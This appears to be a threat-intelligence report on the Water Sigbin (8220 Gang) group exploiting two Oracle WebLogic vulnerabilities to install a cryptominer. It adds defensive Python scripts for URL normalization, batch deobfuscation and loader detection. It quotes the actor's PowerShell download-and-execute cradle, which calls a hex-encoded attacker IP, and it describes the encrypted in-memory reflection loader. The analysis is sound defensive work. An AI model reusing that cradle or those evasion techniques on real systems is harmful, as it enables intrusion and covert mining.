- Water Sigbin exploited CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner via a PowerShell script.
- The group used evasion techniques including hexadecimal encoding of URLs and HTTP over port 443 for stealthy payload delivery.
- The PowerShell script and the resulting batch file used complex encoding, relying on environment variables to hide the malicious code inside seemingly innocuous script components.
- The group achieved fileless execution by using .NET reflection in PowerShell scripts, allowing the malware to run entirely in memory and evade disk-based detection.
- The continued evolution of threat actor tools, tactics, and procedures underscores the need for organizations to stay vigilant and apply layered security measures, such as regular patching, employee training, and incident response planning.
Water Sigbin (also known as the 8220 Gang) is a China-based threat actor that has been active since at least 2017. It focuses on distributing cryptocurrency-mining malware, primarily in cloud environments and on Linux servers. The group is known for including vulnerability exploitation in its broad range of tactics.
In our previous discussion of the…the group's operational tactics were examined to understand its use of constantly evolving and complex techniques. Cyber threats are dynamic, however, and threat actors keep finding new ways to bypass security controls. Recent observations show that Water Sigbin has adopted new techniques to conceal its activity, making its attacks harder to counter.
During our investigation, we observed the threat actor exploiting the Oracle WebLogic server vulnerabilities CVE-2017-3506 (a remote OS command execution vulnerability) and CVE-2023-21839 (an insecure deserialization vulnerability) to deploy a cryptocurrency miner on the affected host via a PowerShell script named bin.ps1. A closer look at the tactics, techniques, and procedures (TTPs) allowed us to attribute the exploitation to Water Sigbin, which continues to update its deployment tactics and tooling.
The attack payload for CVE-2017-3506 was as follows:

The encoded string within the attack payload is as follows:
powershell "IEX(New-Object Net.WebClient).DownloadString('http://0xb9ac8092:443/bin.ps1')"
The attack payload for CVE-2023-21839 is shown in Figure 2.

During our analysis, we observed exploitation attempts on both Linux and Windows systems: the threat actor used shell scripts on Linux machines and a PowerShell script on Windows systems. For this analysis, we focus on the Windows exploitation, which shows an interesting obfuscation technique used by Water Sigbin.
At the start of payload delivery during exploitation, the actors used specific techniques to avoid detection:
- Hexadecimal encoding of URLs:
The URL used to download and execute the PowerShell script is shown below:

In dotted-decimal notation this URL corresponds to http://185.172.128.146:443/bin[.]ps1
- HTTP over port 443:
As seen in the URL above, Water Sigbin uses HTTP over port 443 to make its communication less conspicuous.
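As an added example (not code from the original post or from Trend Micro), the following Python script normalizes the kind of URL shown above: it extracts URLs from a command line, converts a host written as a hex integer (0xb9ac8092 decodes to 185.172.128.146) or as a plain decimal integer to dotted-decimal form, and flags HTTP carried on port 443 (or HTTPS on port 80). The sample command line is constructed to mirror the cradle quoted above; the function and flag names are my own.

```python
import re
import socket
import struct
from urllib.parse import urlsplit

# Constructed sample mirroring the download cradle discussed above (straight quotes).
SAMPLE_CRADLE = (
    "powershell \"IEX(New-Object Net.WebClient)"
    ".DownloadString('http://0xb9ac8092:443/bin.ps1')\""
)

URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def find_urls(text):
    """Pull candidate URLs out of a command line or script body."""
    return URL_RE.findall(text)


def decode_numeric_host(host):
    """Map a host written as a single integer (hex '0x...' or plain decimal)
    to dotted-decimal IPv4; any other host string is returned unchanged."""
    if re.fullmatch(r"0x[0-9a-f]{1,8}", host, re.IGNORECASE):
        value = int(host, 16)
    elif re.fullmatch(r"[1-9][0-9]{0,9}", host):
        value = int(host)
    else:
        return host
    if value > 0xFFFFFFFF:          # not representable as IPv4
        return host
    return socket.inet_ntoa(struct.pack("!I", value))


def analyze_url(url):
    """Normalize the host and flag the two evasions described in the text:
    a numeric (non-dotted) host and a scheme/port mismatch such as HTTP on 443."""
    parts = urlsplit(url)
    raw_host = parts.hostname or ""
    host = decode_numeric_host(raw_host)
    port = parts.port
    if port is None:                 # default port for the scheme
        port = 443 if parts.scheme.lower() == "https" else 80
    flags = []
    if host != raw_host:
        flags.append("numeric_host")
    if (parts.scheme.lower(), port) in {("http", 443), ("https", 80)}:
        flags.append("scheme_port_mismatch")
    return {"url": url, "raw_host": raw_host, "host": host,
            "scheme": parts.scheme.lower(), "port": port,
            "path": parts.path, "flags": flags}


def analyze_command(cmd):
    """Analyze every URL found in a command line."""
    return [analyze_url(u) for u in find_urls(cmd)]


if __name__ == "__main__":
    for result in analyze_command(SAMPLE_CRADLE):
        print(result)
```

The normalized host is what should be matched against blocklists and IoC feeds; the raw form is kept alongside it because the integer spelling itself is a useful detection feature, since legitimate download cradles almost never use it.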
The file bin.ps1 consists of two parts:
- A long base64-encoded string containing binary data and the instructions for executing it
- A function that decodes the base64 string, writes the decoded content to a file named microsoft_office365.bat in the temporary directory, and executes it silently

The base64-encoded content, decoded by the function Convert-Base64ToFileAndExecuteSilently in bin.ps1, reveals the core script components. The decoded content is written to the file microsoft_office365.bat in the temporary directory.
Analysis of microsoft_office365.bat
The script microsoft_office365.bat uses environment variables to obfuscate the main script code, giving it an appearance of complexity and obscurity. The script begins with the following code:

At first glance, the environment variable definitions look like unreadable or meaningless data. On closer examination, however, it becomes clear that the threat actors have hidden their malicious code using a simple but effective approach.
To reveal the actual code, the main "if" condition must first be decoded:

Next, RxEGj must be replaced with an empty string ("") throughout the code. After this, the first part of the script becomes the following:

The first command, cmd /c "set __=&rem", starts a new command prompt and sets the "__" variable to an empty string, then runs rem (the batch command for comments), which does nothing. This part of the script appears intended to open a new, minimized command prompt window and then terminate the current script.
The next two long lines of base64-encoded data contain the actual binary code, which must be processed before it can run. The attacker uses PowerShell to handle this data.
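The substitution described above can be done mechanically. The Python script below is an added example, not the actual microsoft_office365.bat or any code from the post: it walks a batch script the way cmd.exe does, records each set assignment, expands %NAME% references with the values seen so far, and drops the definitions of variables that are empty, which is what replacing RxEGj with "" achieves. The sample script and the variable names __ and ZQ in it are constructed; only the junk token name RxEGj comes from the post.

```python
import re

# Constructed sample in the style described above (not the actual
# microsoft_office365.bat): a junk variable, RxEGj as on the page, is set to an
# empty string and then spliced into every command so the script reads as
# garbage until the variable is resolved.
SAMPLE_BAT = r'''@echo off
set "RxEGj="
set "__=p%RxEGj%ow%RxEGj%er%RxEGj%sh%RxEGj%ell"
set "ZQ=-No%RxEGj%Pro%RxEGj%file"
if "%RxEGj%" == "" (
  %__% %ZQ% -Command "Write-Host deobfuscated"
)
'''

# 'set NAME=VALUE' and 'set "NAME=VALUE"' forms; the value may be empty.
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
# %NAME% references (immediate expansion only; !NAME! delayed expansion is not handled).
REF_RE = re.compile(r"%([^%\s]+)%")


def expand(line, env):
    """Replace %NAME% with its known value; unknown names are left untouched
    so the analyst can see what the script still depends on."""
    def sub(match):
        key = match.group(1).lower()
        return env[key] if key in env else match.group(0)
    return REF_RE.sub(sub, line)


def deobfuscate_batch(text):
    """Walk the script top to bottom as cmd.exe would, recording each 'set'
    and expanding later references. Returns (cleaned script, final variables).
    Definitions of empty variables are dropped: they only fragment strings."""
    env = {}
    out = []
    for raw in text.splitlines():
        m = SET_RE.match(raw)
        if m:
            name, value = m.group(1), expand(m.group(2), env)
            env[name.lower()] = value
            if value != "":
                out.append(f'set "{name}={value}"')
            continue
        out.append(expand(raw, env))
    return "\n".join(out), env


def junk_variables(env):
    """Names whose value is empty: candidates for the RxEGj-style padding token."""
    return sorted(name for name, value in env.items() if value == "")


if __name__ == "__main__":
    cleaned, env = deobfuscate_batch(SAMPLE_BAT)
    print("junk variables:", junk_variables(env))
    print(cleaned)
```

The resolver covers only immediate %NAME% expansion; delayed expansion (!NAME!), substring and replace syntax (%NAME:~0,3%, %NAME:a=b%) and set /a arithmetic would need to be added before running it over real samples, which commonly mix several of these.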

The following section contains obfuscated PowerShell code that processes the base64-encoded string for later use.
Similarly, deobfuscating the remaining section by replacing RxEGj with an empty string ("") reveals the actual PowerShell code:
This PowerShell command performs the following operations:
- Decodes the base64 string ([Convert]::FromBase64String)
- Decrypts ([System.Security.Cryptography.Aes]) the resulting long string
- Decompresses the decrypted data ([IO.Compression.CompressionMode])
- Runs the malware code via .NET in-memory reflection ([System.Reflection.Assembly])
By using System.Reflection.Assembly, the attacker achieves fileless execution, with all operations confined to memory.
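To show how a defender can recognize this four-stage chain in a script body, here is an added Python example (my own heuristic, not code from the post, from Trend Micro, or from the actor). It normalizes a PowerShell fragment (removes backtick escapes, joins '+'-concatenated string literals, strips quotes, lower-cases) and then checks for each stage the text lists: base64 decoding, AES, a decompression stream, and Assembly::Load. The two sample fragments are constructed; the loader-shaped one leaves its inputs undefined and does nothing on its own.

```python
import re

# Constructed PowerShell fragments, not code from the page or from the actor.
# SAMPLE_LOADER has the shape of the four-stage chain described above, with one
# type name split by '+' string concatenation as an obfuscation case; $blob,
# $plain and $bytes are deliberately undefined, so the fragment does nothing.
SAMPLE_LOADER = r'''
$raw = [Convert]::FromBase64String($blob)
$aes = [System.Security.Cryptography.Aes]::Create()
$ms  = New-Object IO.MemoryStream(,$plain)
$gz  = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
$asm = ([Type]('System.Reflection.Assem' + 'bly'))::Load($bytes)
'''

# Ordinary base64 use (reading a config value) that should not trip the rule.
SAMPLE_BENIGN = r'''
$cfg = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($env:APP_CONFIG))
Write-Host $cfg
'''

# One regex per stage of the chain, matched against normalized (lower-case,
# unquoted, concatenation-collapsed) text.
STAGES = [
    ("base64_decode",   r"convert\]::frombase64string"),
    ("aes_decrypt",     r"security\.cryptography\.aes|aesmanaged|aescryptoserviceprovider"),
    ("decompress",      r"io\.compression\.(compressionmode|gzipstream|deflatestream)"),
    ("reflective_load", r"reflection\.assembly\W{0,4}::\s*load"),
]

# 'abc' + 'def'  ->  'abcdef'  (double quotes handled the same way)
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def normalize(script):
    """Undo the cheap obfuscations that defeat naive substring matching:
    backtick escapes inside strings, string concatenation, mixed case."""
    text = script.replace("`", "")
    while True:
        joined = CONCAT_RE.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", text)
        if joined == text:
            break
        text = joined
    text = text.replace("'", "").replace('"', "")
    return re.sub(r"\s+", " ", text).lower()


def classify(script):
    """Report which stages are present. Reflective loading combined with at
    least two decode/decrypt/decompress stages is the in-memory loader pattern."""
    text = normalize(script)
    stages = [name for name, pattern in STAGES if re.search(pattern, text)]
    suspicious = "reflective_load" in stages and len(stages) >= 3
    return {"stages": stages, "suspicious": suspicious}


if __name__ == "__main__":
    for label, sample in (("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        print(label, classify(sample))
```

The verdict requires Assembly::Load plus two of the other stages, so a script that merely decodes a base64 configuration value stays below the threshold. In practice this kind of content rule is best paired with PowerShell Script Block Logging (event ID 4104), which records the deobfuscated script text that actually ran rather than the on-disk form.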
Water Sigbin's activity around CVE-2017-3506 and CVE-2023-21839 shows how adaptable present-day threat actors are. Its use of obfuscation methods such as hexadecimal URL encoding, layered encoding in PowerShell and batch scripts, environment-variable tricks, and multiple layers of obfuscation to hide malicious code inside seemingly harmless scripts shows how effectively Water Sigbin covers its tracks, making detection and prevention harder for security teams.
These evolving tactics call for continued vigilance and proactive measures to protect systems and networks against advanced threats.
To improve protection against vulnerability exploitation like that carried out by Water Sigbin, organizations can adopt the following security best practices and proactive defenses:
- Software patching. Give priority to routine updates and software patching to ensure that all systems are operating on the latest software versions. Swiftly apply security patches for known vulnerabilities, particularly those with public exploits.
- Network segmentation. Employ network segmentation to minimize the attack surface. By segregating crucial network segments from the broader network, the impact of potential vulnerability exploits can be lessened.
- Regular security evaluations. Conduct periodic security evaluations and vulnerability scans to detect and rectify potential weaknesses in the infrastructure before they can be exploited.
- Cybersecurity training. Educate staff about common attacker tactics to help them recognize and avoid falling prey to social engineering attacks that may precede vulnerability exploits.
- Incident response preparedness. Develop, test, and maintain an incident response plan to enable a prompt and effective response to security breaches or vulnerability exploitation.
- Threat intelligence integration. Subscribe to threat intelligence sources to stay informed about the latest threats and tactics employed by threat actors and advanced persistent threat (APT) groups.
The following protections are in place to detect malicious activity and protect Trend customers against exploitation of the vulnerabilities discussed in this blog entry:
- 1011716 – Oracle Weblogic Server Insecure Deserialization Vulnerability (CVE-2023-21839)
- 1010550 – Oracle WebLogic WLS Security Component Remote Code Execution Vulnerability (CVE-2017-3506)
The indicators of compromise for this entry can be accessed here.
MITRE ATT&CK
| Tactic | Technique | Technique ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 |
| Defense Evasion | Obfuscated Files or Information: Command Obfuscation | T1027.010 |
| Defense Evasion | Hide Artifacts: Hidden Window | T1564.003 |
| Defense Evasion | Process Injection: Portable Executable Injection | T1055.002 |
| Defense Evasion | Reflective Code Loading | T1620 |
| Command and Control | Data Encoding: Standard Encoding | T1132.001 |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 |
| Command and Control | Ingress Tool Transfer | T1105 |